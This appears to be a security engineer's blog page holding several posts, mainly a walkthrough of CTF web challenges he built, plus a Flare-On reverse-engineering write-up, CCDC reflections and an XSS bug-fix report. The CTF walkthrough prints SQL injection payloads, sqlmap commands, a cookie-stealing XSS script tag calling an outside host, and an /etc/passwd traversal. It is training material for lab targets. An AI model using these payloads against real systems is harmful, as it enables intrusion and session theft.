Dave Kukfa Security engineer etc.

Proximate vs. Ultimate Causes

Simple definition from Wikipedia:

A proximate cause is an event which is closest to, or immediately responsible for causing, some observed result. This exists in contrast to a higher-level ultimate cause (or distal cause) which is usually thought of as the “real” reason something occurred. In most situations, an ultimate cause may itself be a proximate cause for a further ultimate cause.

Example from Guns, Germs, and Steel:

Yet another type of explanation lists the immediate factors that enabled Europeans to kill or conquer other peoples—especially European guns, infectious diseases, steel tools, and manufactured products. Such an explanation is on the right track, as those factors demonstrably were directly responsible for European conquests. However, this hypothesis is incomplete, because it still offers only a proximate (first-stage) explanation identifying immediate causes. It invites a search for ultimate causes: why were Europeans, rather than Africans or Native Americans, the ones to end up with guns, the nastiest germs, and steel?

Farnam Street goes into further detail by describing techniques for establishing and mapping ultimate causes.

ISTS 15 Web Challenges

This year, I had the awesome opportunity to serve as the organizer and team lead of the CTF within SPARSA’s annual ISTS competition. This entailed managing a small team of 5 students as we created CTF challenges for each of the 5 CTF categories (Web, Reversing, Crypto, Forensics, and Misc). Besides gaining experience managing a team for the first time and planning and executing a project from conception to completion, I was also able to sharpen my technical skills by creating challenges.

I was in charge of the web category this year, and created 5 challenges that range from beginner to advanced level. This post walks through each of them, and explains the intended path that a player would take to arrive at the solution.


Web 100 (titled Layers) starts us off by presenting the user with a quote from the 2001 DreamWorks classic, Shrek.

Shrek quote

Inspecting the page’s source reveals a series of layered divs, with a different background image for each.

Series of divs in browser dev tools

To reach the flag, the user can ‘peel back’ each layer by removing it from the DOM using the browser’s dev tools.

Removing layers of divs

Reaching the bottommost image (nineteen) reveals the flag in the form of an animated GIF.

Animated GIF flag


The next challenge provides an HTTPS link to a surgical center with some… interesting procedures.

Bleeding Heart Surgical Center

Poking around the site reveals tons of sketchy medical procedures and questionable ethics, but little in terms of functionality or dynamic content.

Would you trust them?

Hint: The “Not secure” warning next to the address bar is telling the truth. The vulnerability lies in the web server’s OpenSSL library – the server is vulnerable to Heartbleed. This can be verified using a tool like nmap:

nmap scan reveals Heartbleed vulnerability

To exploit the bug, launch a simple PoC script against the target. I used this GitHub gist and got the flag in the memory dump:

Flag in Heartbleed memory dump


Web 300 cuts right to the chase – the user is instantly greeted with a form with bunch of inputs on a PHP endpoint.

Web 300 homepage

Submitting the form displays a horoscope that changes according to the user’s birth date.

Our endearing horoscope

After poking at this for a while, one might think to try a SQL injection attack (shown below in Burp Suite Repeater). However, we quickly discover the application’s defenses don’t like that:

No funny business!

These defenses seem to hold true for both the day and year fields. Messing with the month is also frowned upon:

Still no funny business!

However, when we leave the original month name intact, but add some SQL injection probes after it, we get a different response.

Funny business!

Hmm… let’s try a basic ' or 1=1;# payload.

No dice

Looks like that doesn’t get us very far. Maybe they’re not using single quotes? Let’s try it again, but with double quotes this time:


We got a response this time! It looks like the double quotes did it. So now we definitely know this is SQL injectable, and we need to try to extract the flag from it.

Let’s try to enumerate the tables within the database with this handy SQL line from PentestMonkey:

" union select table_schema,table_name from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema';#

Command failed

But alas, it appears this didn’t work. If we look back at the normal output of the web app, we see the horoscope is the only thing being visibly returned from the database. Aha! Maybe the backend SQL code is only selecting a single column, where our injection is trying to select two? Let’s try it again, but concatenate the table_schema and table_name this time:

" union select concat(concat(table_schema, '.'), table_name) from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema';#

We got a response!

Sweet, that got us a response at least! So we fixed the columns, but we’re still not getting the data we want – the horoscope is still being returned. What could be the problem this time?

Let’s take another look at our injection. We’re using union to combine the results from two select statements: one from the original backend SQL code, and one that we’re injecting to pull the table names. These results are lumped into one large return set with multiple rows, and the database is simply returning the first row, which is the horoscope.

To get around this, we can use SQL’s limit and offset statements to select the exact row we want. Let’s try grabbing the next row:

" union select concat(concat(table_schema, '.'), table_name) from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' limit 1 offset 1;#


Now we’re cooking with gas! This looks like the table containing our flag. Let’s take a look inside and list out the table’s columns with the following injection:

" union select column_name from information_schema.columns where table_schema = 'horoscopes' and table_name = 'flags' limit 1 offset 1;#

A column named flag

A column named flag… this has gotta be it! Let’s dump the flag column:

" union select flag from horoscopes.flags limit 1 offset 1;#


Huh?! This doesn’t look like our flag format… let’s try one more?

This is odd...

This can’t be right… let’s see what other columns exist within the flags table?


A description! This might help us understand what’s going on here. Let’s see what’s inside description:


A description of the Australian flag?!? You can’t mean… AGH! We’ve been duped!! Foiled!

So it looks like this was a fake table designed to throw us off. Thankfully, we can return to an earlier injection and keep looking for tables within the database:

" union select concat(concat(table_schema, '.'), table_name) from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' limit 1 offset 2;#


This looks like the database our horoscopes are pulled from. Let’s try one more:


Aha! This looks fruitful! Let’s take a look at the columns:


An id… not of much use. Anything else?


Just what the doctor ordered. Let’s get this over with, shall we?

Our flag!

Note that it is possible to complete this challenge with SQLmap, but it’s intentionally designed to be difficult to do so. The SQLmap command to pull the private database is:

sqlmap --data='month=January&day=1&year=1999' --level=5 -u --threads=4 -D private --dump

The process of deriving that command is left as an exercise for the reader.


Our next challenge prompts us to get in touch with King Girugamesh via Facebook messenger. We shoot him a message, and he explains himself a bit (keep in mind the Civilization theme of the competition) and asks us to provide him a link on the challenge website.

Girugamesh conversation

The challenge website has a large map that the user can interact with. Clicking a country passes the country’s ID as a query parameter, which loads the country’s name on the page.

Challenge website

Country loaded

There’s also a login link on top, and we can see that Girugamesh is currently logged in. Browsing to the login page loads a simple username/password form.

Login form

Trying some basic SQL injection doesn’t seem to get us anything. We can even fire SQLmap at the login endpoint, and it comes up empty.

sqlmap --data 'username=test&password=test' --level=5 -u --threads=4

SQLmap error

So now what? Let’s go back to our homepage for right now. After poking around a bit, we discover that inputting an alphabetical country ID generates an error message on the map:

Map error message

That looks like user input being reflected back on the page! Perhaps this is vulnerable to XSS?

XSS payload works

Looks like it is! But what value does XSS have to us? We’re trying to attack the server, not a user, right?

Let’s revisit what we know so far. Girugamesh asked us for a link to the challenge website, and he’s currently logged in… maybe we can leverage the XSS to steal his cookie and access the web app!

To help us accomplish this, we can use XSSHunter to generate a payload that will report a ton of information back to us whenever the XSS fires, including the victim’s cookies. Our new XSSHunter payload is:<script src=https://dave.xss.ht></script>

Let’s send that over to Girugamesh!

Looks like he doesn't like it

Hmm… looks like he knows something’s fishy here. We’ll need to find a way to make the link less suspicious so Girugamesh will click it. He said something about the ID having words… maybe we can URL-encode it to get rid of them? After URL-encoding, our new payload is:

Girugamesh happily clicks our link now, and the XSS payload fires! We can use the generated XSSHunter report to view information gathered from the attack, including his session cookie.

He clicked it!

Our XSSHunter report reveals a cookie named flag with a value of ... ..-. ..- --.. ..- - ...- -- ... - -. --.. ..- ..-. .-. .--- ..- -.-- -.-- ..- -.- .--.. Is that… Morse code? Whatever, let’s load it into our browser and see what the logged-in version of the page looks like.


All we get is a welcome message and a cheeky YouTube video. Perhaps the flag is within the Morse code itself? Running the cookie through a Morse code translator reveals the string SFUZUTVMSTNZUFRJUYYUKP, but this value is rejected when we try to enter it as a flag. There must be something else going on here!

Remember our login page? Maybe there’s something there that can indicate how our cookie is generated. Taking a look at the login page source reveals an algorithm for generating the cookie client-side, which replaces our password and is sent to the server.

function hash_password(pwField) {
	hash = pwField.value.toLowerCase().split('');

	caesarian_shift(hash, 13);
	rotate_right(hash, 37);
	swap_chars(hash, 'g', 'i');
	swap_chars(hash, 'r', 'u');
	swap_chars(hash, 'g', 'a');
	swap_chars(hash, 'm', 'e');
	swap_chars(hash, 's', 'h');
	hash = morse_code(hash);

	pwField.value = hash.join(' ').replace(/ +/g, ' ');

To get the original password (and the flag), it looks like we’ll have to work backwards through this function to reverse this ‘hashing’ process:

  1. Translate the Morse code
  2. Replace all H’s with S’s
  3. Replace all E’s with M’s
  4. Replace all A’s with G’s
  5. Replace all U’s with R’s
  6. Replace all I’s with G’s
  7. Left-rotate the array 37 times
  8. Finally, perform a Caesarian shift with a key of 13 (26-13 = 13)

Reversing the algorithm reveals the original password WELLEXCUSEMEGIRUGAMESH. Entering this as our flag solves the challenge and takes us to the final round!


The final challenge brings us to an eccentrically-designed gym website, complete with flaming text and rippling biceps.

House of Curl

The page’s source code is pretty bare – it appears to be a simple static page. To verify, we can try requesting the index page to confirm its file type. Let’s try .html, .htm, and .php for good measure:



No dice so far…

PHP works

.php did it! Now we know the site is dynamic – there could be some server-side PHP code that checks some aspect of our request, and returns different pages depending on that aspect. After all, that message on the site seems pretty suspicious. Perhaps we need to provide the ‘magic words’?

Let’s take another look at the site. Given the name of the gym and the pictures on the page, they seem to focus pretty heavily on bicep curls. In fact, that’s the only exercise on the entire website. Hmm, a web challenge with bicep curls… could they be referring to cURL, the command-line tool?

Let’s find out! When requesting the page with cURL, we get the following result:


Bingo! Requesting with cURL gives us a completely different output. Looks like Gilgamesh is trying to sell the stuff he stole from Girugamesh in the previous challenge. Let’s check out these goods he’s selling:

Goods image gallery

We’re greeted by an image gallery of the miscellaneous items and services that constitute the latest ‘Girugamesh loot’. Looking at the page source, something peculiar jumps out at us:

Funky image retrieval

All the images are retrieved dynamically from a PHP endpoint! It looks like we can specify the location of the image we want, and provide some sort of an access token as well.

Are you thinking what I’m thinking? Let’s try to request something other than an image using a directory traversal attack! We can start with the classic /etc/passwd payload, and use the same access token as the images on the page:

Not happening

Hmm, it looks like there are some protections in place. The application must somehow detect that /etc/passwd isn’t an image. If we look at the images on the page, all of their file paths begin with the images directory. Maybe if we start our directory traversal from images, we can evade the application’s image checks?

Invalid access token

Sweet, we got some different output this time! Now it looks like our access token is the problem. The same token used for most of the images on the page doesn’t seem to work for accessing /etc/passwd.

To understand what’s going on, let’s revisit the original access tokens on the page. The token ffd8ffe0 is used for almost all of the images, with the exception of ffd8ffe1. These characters are all within the range of valid hexadecimal numbers. Maybe our access token is a certain 4-byte value in hex? Throwing our access token in a hex editor converts it to four random Unicode characters, which isn’t too helpful:

Random characters

At this point we’re pretty stumped. Let’s try throwing the access code into Google to see what comes up:

File signatures

It looks like this is the file signature for JPEG images. Some more quick searching reveals ffd8ffe1 is an alternative file signature for JPEGs with EXIF data. Could our access token simply be the file signature of the file we’re requesting?

To test this, let’s download two images from the page: sub.JPG with access token ffd8ffe0, and mantle.jpg with access token ffd8ffe1. Loading them into a hex editor, we see sub.JPG indeed begins with bytes FF D8 FF E0, and mantle.jpg begins with FF D8 FF E1.



Cool, so it looks like our hypothesis is correct! To access a file, we need to know its first 4 bytes. So for /etc/passwd, what would they be?

root account

/etc/passwd usually starts with the root account, which occupies the first 4 bytes. Typing root in our hex editor reveals the bytes 72 6F 6F 74. Let’s try that as our access token:


Awesome, that worked! So we know how to access arbitrary files on the web server, now we just need to find and pull the flag. However, this is easier said than done: the flag could be anywhere in the filesystem, and we don’t have much indication of where to look.

To get a better idea of where to start, let’s request the PHP file itself so we can see its code. We’ll start in the images folder and traverse upward to access viewimage.php. Now we just need to guess the access code.

Similar to the /etc/passwd file, most PHP files start with a predictable 4 bytes. When the PHP interpreter parses a file, it looks for PHP opening and closing tags (<?php and ?>) to know when to start and stop interpreting PHP code. Conveniently for us, this opening tag is usually located directly at the beginning of PHP files. Thus, our access code would be <?ph, or 3C 3F 70 68 in hex. Let’s give it a try:

Blank page

What?! Nothing at all? No error message, even?

Source code

Phew, false alarm. It doesn’t look like there’s any information about the flag within the PHP code, but there’s a comment with a link to a blog post on yet another site. Let’s see what’s on that page:

Blog post

Interesting… it looks like this is where Gilgamesh brags about his latest engineering ‘accomplishments’. Another post on the site hints about his upcoming payment processing system that has yet to be released:

duMass Payment Processor

From this post, we can gather that the payment processor is written in PHP and the code is ready to be released. At the bottom of the blog, Gilgamesh links to some communities he’s a member of, all of which are for WordPress plugin development:

WordPress Plugin Developers

This new payment processor may very well be a WordPress plugin. Let’s check the plugin directory of his blog:

duMass directory

Aha! Just what we’re looking for. Let’s take a look inside:

duMass files

An HTML and a PHP file. Browsing to the PHP file triggers some sort of anti-tamper protection:

Tampering detected!

To understand how this PHP endpoint is used, let’s look at the HTML file:

HTML form

Looks like a form that users submit when they want to purchase something. Filling it out and submitting it returns the following message from process-payment.php:

How rude!

Well that was rude! At least the anti-tamper protection wasn’t triggered. And it looks like we’re on a different IP now! Wait, is that the same IP from the Girugamap challenge? Let’s take another look at that form:

HTML source

What’s this?! It looks like the form’s POST endpoint has been replaced. No way… Girugamesh backdoored the payment processor by redirecting the form to his site!! His endpoint is pretty rude though. I wonder what the original endpoint does?

The PHP file didn’t like it when it was requested directly, but Girugamesh’s seemed to run fine when we submitted data to it through the HTML form. To replicate this, we can use Chrome’s Developer Tools to replace the backdoored endpoint with the original:

Replaced with original endpoint

Now let’s submit the form and see what happens:

A nicer message

Ah, this is much friendlier. But still not very helpful! Wait a second, our open Developer Tools window caught something:

The flag!

Finally, we get the flag! Thus concludes this year’s web challenges. Hopefully Gilgamesh learned his lesson!

My Experiences Competing in CCDC

The Collegiate Cyber Defense Competition (CCDC) is often mentioned in discussions about security education. Specifically, there’s been a good amount of debate on the value of the competition and what students learn by participating. After competing at NCCDC this past weekend and wrapping up my final CCDC season, I’d like to share some thoughts I have about the competition and its value in education and the security community. Please note that this post represents my thoughts and opinions as an individual, and not necessarily those of my team or institution.

Initial Attraction

At the beginning of my Junior year in the CSEC program at RIT, I had gotten my feet wet learning about information security, and I wanted to dive into the forefront of the security community and quickly climb the learning curve of security education. I was learning about web and systems security through various online resources, and wanted to exercise those skills in a competitive environment to test myself and learn from others.

My school competes in CCDC and is a regular contender at the national competition, so when tryouts came around, I applied for a web security role within the team. Soon after, I joined the team specializing in web security and took on the additional role of managing injects (business tasks assigned to teams during the competition). This allowed me to leverage and build upon my soft skills as well as my technical skills.


Practicing for and competing in CCDC over the coming months taught me a great deal about OS internals and how systems interact with one another. I became comfortable operating in both Windows and Linux environments, and learned to dig deep into either system to hunt for red team malware and rootkits. I also learned to backtrace red team attacks to identify and remediate the root causes of compromise.

Competing in CCDC allowed me the opportunity to meet tons of great people in the security space who are involved in the competition – everyone from red teamers to white teamers to other students. After each competition, the red teamers do an individual debrief with each team to address what the team did well and what they could improve on. This is paramount for learning from the competition and improving for future iterations.

Many internships and full-time jobs are found from CCDC competitions. Participating in CCDC is a great way to demonstrate your interest and dedication in security, which is noticed by sponsors and red teamers looking to expand their teams and hire passionate students.


Many of the complaints raised against CCDC address how the competition is run in a vacuum of sorts. By this, I mean that competitors often need to ‘game the game’ and do things you would never see or do in practice. Winning teams usually end up employing crazy strategies or tactics that are hardly viable in the real world. For example, I’ve heard of teams using embedded devices such as phones or printers as firewalls, and scripting snapshot restores on virtualized systems to avoid red team persistence but just barely pass scoring checks. Teams may also resort to disabling core components or functionality of the operating system in order to reduce attack surface. These strategies are creative and clever, but where do these skills transfer to real-world scenarios and environments?

Historically, the networks that competitors are tasked to defend can contain systems or technologies that are woefully out of date – sometimes being EOL’d more than a decade ago. While these may be present in some networks in reality, it would be more beneficial to learn to use and defend modern systems and technologies rather than legacy systems of yesteryear.

The North Eastern region (NECCDC) is doing a great job at changing this. This year’s regional competition featured a modern network (including development and production clouds complete with load balancers) as well as modern technologies (GitLab, Foreman, and Jenkins). These types of topologies are much more likely to be encountered in the real world, and training and competing within updated infrastructures will better prepare students for things they’ll see on the job.

Is it worth it?

After my first year, I continued to participate in CCDC. This was largely to continue improving my technical skills (OS internals, malware hunting) and my soft skills (teamwork, management, writing). However, I believe there’s a point of diminishing returns for participating in CCDC. After reaching this point, students will only get better at competing in CCDC with little transfer of skills or expertise to the real world. The length of time it takes to reach this point will differ between students, but I do believe it exists whether it takes 4 years or a single season.

Bottom line

CCDC has taught me a lot, and I’m thankful for the opportunities it’s provided me over the years. Overall, I can conclude that participating in CCDC yields a lot of learning and experience, but there’s a point of diminishing returns where these rewards lessen year by year. Students should evaluate whether the competition is worth it for them with respect to the nature of the competition and their prospective career path.

2016 Flare-On Challenge Write-Up

I had a chance to test my reverse engineering skills in FireEye’s Flare-On challenge this year. While I didn’t get very far, I was still able to learn a ton and sharpen my skills for next year. All of the challenges are available on the Flare-On website, so feel free to follow along. With that said, let’s jump over that function call into the solutions!

Challenge 1

Starting off, we’re given a challenge1.exe binary. Running the binary will prompt the user for a password:

Incorrect password

Let’s take a closer look at the binary. Loading the challenge into Binary Ninja, we can quickly locate the strings used when comparing the passwords:

Comparison strings

Looking at the cross-references to the “Enter password” string, we can jump to the password comparison function. Near the comparison itself, the string “x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q” is pushed to the stack.

Pushing string to stack

This looks fruitful! Let’s try entering this as the password:


Dang, no dice! Let’s use a debugger to see what’s actually being compared. By setting a breakpoint on the function called just before the comparison, then entering the password “test”, we see the string “aDSwaZ==” is passed to the function instead of our original input.

Debugger view

The double equals sign on the end of the string is a dead giveaway for a base64-encoded string. It looks like the program is base64-encoding our input, then comparing it to the comparison string (x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q). If we base64-decode the comparision string, we’ll know the correct input to enter. Using a base64 decoder, let’s see what our comparison value decodes to:

Decoded gobbledegook

Huh, that doesn’t look right. There’s a lot of bytes outside the ASCII byte range. It looks like there’s something fishy going on here…

To understand what’s going on, I needed to do a bit of research about base64. I was looking at an example implementation of a base64 algorithm when I saw the following line of code:

private static final String CODES = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

This looks like an alphabet that’s designed to be easily changed. Curious, I scrolled up on the page and found the following information:

The particular set of 64 characters chosen to represent the 64 place-values for the base varies between implementations. The general strategy is to choose 64 characters that are both members of a subset common to most encodings, and also printable.

So it looks like this alphabet is changeable! Going back to the strings in the binary, we can quickly identify a 64-character value that looks like another alphabet:

Alternative base64 alphabet

A quick Google search reveals a tool that can perform base64 encodings with alternative alphabets for us. Entering the custom alphabet we just found and our comparison string returns “[email protected]” as output. This looks like our flag! Let’s give it a try:


Sweet! Entering the password on the Flare-On website moves us on to the next challenge.

Challenge 2

The next challenge is aptly named DudeLocker.exe, with an included BusinessPapers.doc that appears to be encrypted. Upon inspecting the binary in Binja, we can see there are several initial checks that must be passed.

The first of which involves a call to SHGetFolderPath, which retrieves the paths of special system folders and returns 0 if the operation was successful.

Call to SHGetFolderPath

The 2nd parameter being passed to SHGetFolderPath (the 4th value pushed to the stack), 0x10, is a CSIDL value identifying the folder being retrieved. A quick lookup reveals CSIDL 0x10 corresponds to the user’s desktop directory. So, this function attempt will grab the path of the desktop, and the program will continue if the operation was successful.

The next block checks if the length of our retrieved desktop path is less than or equal to 0xf8, or 248 in decimal. If so, the program continues; otherwise, it returns.

Checking desktop path length

Afterwards, we see a block with a call to CreateFile at the end. CreateFile, according to MSDN, “creates or opens a file or I/O device”. Despite its name, the I/O devices it works with are not limited to files; it also works with file streams, directories, physical disks, volumes, etc. The function takes the name of the I/O device as a parameter (the last value pushed to the stack), followed by 6 additional parameters describing the device’s attributes.

Showing call to CreateFile

The filename parameter (var_244) is constructed earlier in the block. We see it’s being passed to sub_401000 along with var_44c, which contains our desktop path from earlier, and var_3c, which contains the string “Briefcase”. The subroutine will concatenate “\Briefcase” to our desktop path, which is then used in the CreateFile call.

So CreateFile will attempt to open an I/O device located on our desktop named Briefcase. For more information, let’s take a look at the additional parameters. dwDesiredAccess is set to 0x80000000 (GENERIC_READ), dwShareMode is set to 0x1 (FILE_SHARE_READ), lpSecurityAttributes is set to 0, dwCreationDisposition is set to 0x3 (OPEN_EXISTING), and dwFlagsAndAttributes is set to 0x02000000 (FILE_FLAG_BACKUP_SEMANTICS). There’s an important note alongside FILE_FLAG_BACKUP_SEMANTICS: “You must set this flag to obtain a handle to a directory.”

It looks like CreateFile is attempting to open an existing directory named Briefcase located on our desktop. If this operation fails, an error code of 0xffffffff is returned (INVALID_HANDLE_VALUE), which will print a taunting message and exit the program. Otherwise, we proceed onwards.

The next check lands us in a subroutine that calls GetVolumeInformation to retrieve the serial number of our root (C:) volume. This was deduced by tracing the parameters as we just did above, which is left as an exercise to the reader. The serial number is compared to the value 0x7dab1d35 (“The Dude Abides”) – if they aren’t equal, eax is cleared; otherwise, eax remains.

Block comparing serial number

We need eax != 0 to pass this check, so we’ll have to either change our C volume’s serial number or bypass this check with a debugger. I opted to use the handy VolumeID from Sysinternals to change the volume’s serial. (Did I mention it’s important to work on these in a VM?)

Let’s try running the binary at this point. We’re greeted with a ransom note in the briefcase that rudely replaced my desktop background:

Ransom note

Looks like they want a million Bitcoins. Maybe those business papers will suffice? Let’s drop BusinessPapers.doc in the Briefcase aaaaand…

BusinessPapers still encrypted

Dang, still encrypted. However, the Last Modified date on the file changed, so DudeLocker must have done something with it. Taking another look at the binary reveals calls to CryptEncrypt in the program’s Import Address Table:

CryptEncrypt in IAT

This makes sense, since our modified BusinessPapers.doc still appears to be encrypted. However, the IAT doesn’t seem to have any entries for a decryption function. Taking a look at CryptEncrypt quickly points us to CryptDecrypt, which uses the same arguments sans dwBufLen at the end. If we could patch the call to CryptEncrypt with a call to CryptDecrypt, we might be able to decrypt the contents of the BusinessPapers!

Let’s take another look at the IAT. The entry for CryptEncrypt is 0x24fa, which refers to an offset in the DudeLocker binary. If we add that to the image base of 0x400000, we get 0x4024fa. Inspecting the binary at 0x04024fa reveals the following:

Binary contents at 0x4024fa

Hmm, looks like there’s another offset (0x00ba) followed by “CryptEncrypt” in ASCII. To make sense of what we’re looking at, I loaded the Windows DLL containing CryptEncrypt (advapi32.dll) in Dependency Walker and found the exported CryptEncrypt function:

Dependency Walker output for CryptEncrypt

Aha! It looks like 0x00ba was referring to the function’s hint, which contains the index for that function in the DLL’s export table. The hint for CryptDecrypt is 0x00b4. Are you thinking what I’m thinking??

Patching the binary IAT

Well, you are now. Patching the IAT allowed us to decrypt the file instead of encrypting it! The file still doesn’t look like a DOC file, but if we open it in a hex editor, we see the initial bytes FF D8 FF E0. A quick Google search reveals that’s the file signature for a JPEG image. Changing the file type from .doc to .jpg reveals our flag:

Victory at last!

XSS on a Document Converter

When I was switching my blog to Jekyll, I needed to convert a few long Word docs to Markdown; one of which being the Web Application Cheat Sheet. Being about web security, the document contained many XSS payloads and other nastiness. It also had a lot of nested bullet points, which would have made conversion by hand a pain. So, I found a promising conversion app called word-to-markdown, dropped in the Word doc, and lo and behold..

Reflected XSS alert

Great, should have seen this coming.

It turned out the site was treating the document’s contents as HTML, and thus rendering the content on the right side of the page without HTML-encoding it. This opened up a Reflected XSS vulnerability – albeit not very practical, but still bad nonetheless. Thankfully, the source code was available on GitHub and the developer was very receptive to contributions. I made some quick changes, and after a simple fork and pull request the updated version went live.

The fix was pretty simple – since most people wouldn’t write HTML in a Word doc and expect it to be rendered as such, I HTML-encoded the Markdown after conversion so the document’s contents would show up as regular text and not HTML. Here’s how XSS payloads are rendered now:

HTML-encoded XSS payload